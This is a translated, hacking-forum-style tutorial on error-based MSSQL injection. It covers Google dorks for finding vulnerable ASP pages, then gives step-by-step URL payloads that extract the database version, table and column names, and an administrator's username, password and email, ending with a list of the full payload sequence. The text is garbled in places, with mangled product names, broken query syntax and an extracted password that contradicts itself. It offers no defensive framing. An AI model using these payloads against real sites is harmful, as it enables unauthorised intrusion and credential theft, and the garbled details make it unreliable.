MS Sql Injection
MSSQL-injection

MSSQL – injection
###########################

1.1 Introduction
1.2 How to ask Vulnerability page?
1.3 How to prove that the site of weakness?
1.4 How to find version / name of the DB?
1.5 How to discover the names table (table_name)?
1.6 How to discover the names of column (column_name)?
1.7 How to get data from tables that interest us (eg name, pass, email, etc.)?
1.8 Conclusion?

[1.1 Introduction]
############

This lesson will try to explain that you already know the different techniques, MSSQL-injection.
Who will have the opportunity to learn how this method is used as a favorite act to obtain information (name, password and login) or various other information through this technique.
MSSQL-injection, can be used for products that are created by well-known company Microsoft.
This type of injection, then deal with those sites that are coded in ASP / Aspks etc.

There are several types of attacks in this way:

* – Normal MSSQL SQL Injection attacks
* – MSSQL injection in Web services (SOAP injection)
* – Union with MSSQL injection attack
* – ODBC error attack the “Convert”
* – MSSQL Blind SQL Injection attacks, etc. ..

For this will be used for writing this type of attack:
“Attack of the ODBC error message” Convert ”

[1.2 How to ask Vulnerability page? ]
############################

How to ask who Vulnerability page is easy. This can use Google services company giant.

Let’s open: Google

I write, for example: inurl: “Boleyn”. “ID”
inurl: “neus.asp” menu ”
inurl: “content.asp” under ”
inurl: “games.asp” ID ”
ETC ….( I decided some examples, you can now use the logic, for better dorks)

[1.3 How to prove that the site of weakness? ]
##################################

So we can understand very easily by adding the following ID page of high comma (,).
And in case that gives us the answer we found no error page means Vulnerability example:

++++++++++++++++++++++++++++++++++++++
/ Microsoft Access ODBC driver /
++++++++++++++++++++++++++++++++++++++
/ Open quotation /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Amos DB provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++

These are some of the most common response is shown pages that are weaknesses in the MSSQL – injection.

Should now act as an example here, and where to put high ( ‘).

For example:
————————————–

www.localhost.com/news.asp?id=100′

————————————–

Now we can say that the error is displayed:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e14 ‘

Open quotation mark after the character string “) AND (Volgorde> 0) ORDER BY Volgorde ‘.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

This page has weaknesses!

[1.4 How to find version 2.4 / DB name? ]
############################

Let the example easier to understand:

Version:
————————————————– ——————

www.localhost.com/news.asp?id=100+or+1=convert(int,(@@version))–

————————————————– ——————

And we have presented an example:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion failed when converting nvarchar value ‘MS SQL Server 2008 (SP1) – 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 (Build 6002: Service Pack 2) (SM), a data type Int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++

Now go find DB_Name:
————————————————– ——————-

www.localhost.com/news.asp?id=100+or+1=convert(int,(DB_Name ()))–

————————————————– ——————-

eg.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is not EVILZONE_CREW_DB when converting nvarchar value ‘to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++

[1.5 How to discover the names table (table_name)]
######################################

Because it is discovered, or simply to find the side of the table goes through this method.

For example:
————————————————– ————————————————– ————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables)) —

————————————————– ————————————————– ————–
And now there will be a mistake, such as:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is when converting nvarchar value of users’ data on the type Int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

That is, in this case the table (table_name) The first is the ‘Users’, now find the following table:

For example:
————————————————– ————————————————– ————————————————

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from table_name where information_schema.tables not ( ‘Users’)))–

————————————————– ————————————————– ————————————————

And now an error message will appear the same and will give another table:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is not news when converting nvarchar value ‘to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

Another table in this case is ‘news’

Now to find the table (table_name) third goes like this:

For example:
————————————————– ————————————————– ————————————————– ———

www.localhost.com/news.asp?id=100+or+1 =convert(int,(select top 1 table_name from table_name where information_schema.tables not ( ‘Users’,’ news’)))–

————————————————– ————————————————– ————————————————– ———

I appear to us the third table:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is when converting nvarchar value categories’ of data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

Then the third table ‘categories’, and so on until you find all the tables.

For example:
————————————————– ————————————————– ————————————————– ——————

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from table_name where information_schema.tables not ( ‘Users’, ‘news’, ‘Categories’))) —

————————————————– ————————————————– ————————————————– ——————

[1.6 How to discover the names of column (column_name)]
###########################################

-If you want to column_name for users as’ go:

For example:
————————————————– ————————————————– —————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name = ‘users’))–

————————————————– ————————————————– —————————————–
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion failed when converting nvarchar value ‘Name’ to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

So colums name for the table (table_name) ‘Users’ the ‘name’

Now find the column (column_name) other at the same table ‘Users’:

For example:
————————————————– ————————————————– ————————————————– ——————

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name = ‘users’ and column_name (‘ name’)))–

————————————————– ————————————————– ————————————————– ————————–
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is not a password when converting nvarchar value ‘to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

Columns name (column_name) the other is ‘password’, now go find a rotating column_name:

For example:
————————————————– ————————————————– ————————————————– ——————

www.localhost.com/news.asp?id=100+or+=convert(int,(select top 1 column_name from information_schema.columns where table_name = ‘users’ and column_name ( ‘name’, ‘password’)))–

————————————————– ————————————————– ————————————————– —————————————
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion failed when converting nvarchar value ’emailaddress’ to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

Therefore, the third Colum_name ’emailaddress’ and so on and on until the end, to find all of the columns (column_name)!

[1.7 How to get data that interest you (our user name, pass, email, etc.)]
################################################## ###

To do so you do not have anything to ndyshe we mentioned before.
In this section, all that needs to be done is to table (table_name), and the names of column (column_name) in their earlier results found.

In this section will be used:
Table_name = Users
Column_name = user name, password, emailaddress!

Some have now replaced the example:
————————————————– —————————————–
www.localhost.com/news.asp?id =100+or+1=convert (int,(select top 1 name from Users))–[CODE]
————————————————– —————————————–
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is not an administrator when converting nvarchar value ‘to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

user name: Administrator

Replacing now the first column “Name” in the second column “password”:

For example:
————————————————– —————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top password from the user 1))–

————————————————– —————————————–

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion failed when converting nvarchar value ‘123456 ‘to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

password: administratorpassword123

Now, instead of rotating columns works the same as above:

For example:
————————————————– ———————————————

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 from users emailaddress)) —

————————————————– ———————————————

emailaddress: [email protected]

Here then we have achieved some info on, and the name / pass and emailaddress page.

user name: Administrator
password: administratorpassword123
emailaddress: [email protected]

[ 1.8 Conclusion ]
############

================================================== ===========================

www.localhost.com/news.asp?id=100′

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(@@version))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(db_name()))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (‘Users’)))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (‘Users’ , ‘members’)))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (‘Users’ , ‘members’ , ‘categories’)))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’Users’))–

————————————————————————————————————————————————————————–

www.ocalhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’Users’ and column_name not in (‘username’)))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’Users’ and column_name not in (‘username’ , ‘password’)))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 username from Users))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 password from Users))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))–

================================================== ===========================

Explore More

Download NetWitness Investigator Software

Download NetWitness Investigator Software Release Date: 11/17/2008 Version: 8.6.4.9 File Size: 31.6MB Download #1 (USA) Fastest | Download #2 (USA) Fast NetWitness® Investigator is the award-winning interactive threat analysis application

Security/Hacking Tools & Utilities

1. Nmap I think everyone has heard of this one, recently evolved into the 4.x series.Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing.

critical SQL injection (vulnerability) on Burmese Classic http://www.burmeseclassic.com

PlanetCreator.Net’s Security Team member zai22 reported another critical SQL injection (vulnerability) on Burmese Classic http://www.burmeseclassic.com SQL injection is a code injection technique that exploits a security vulnerability occurring in the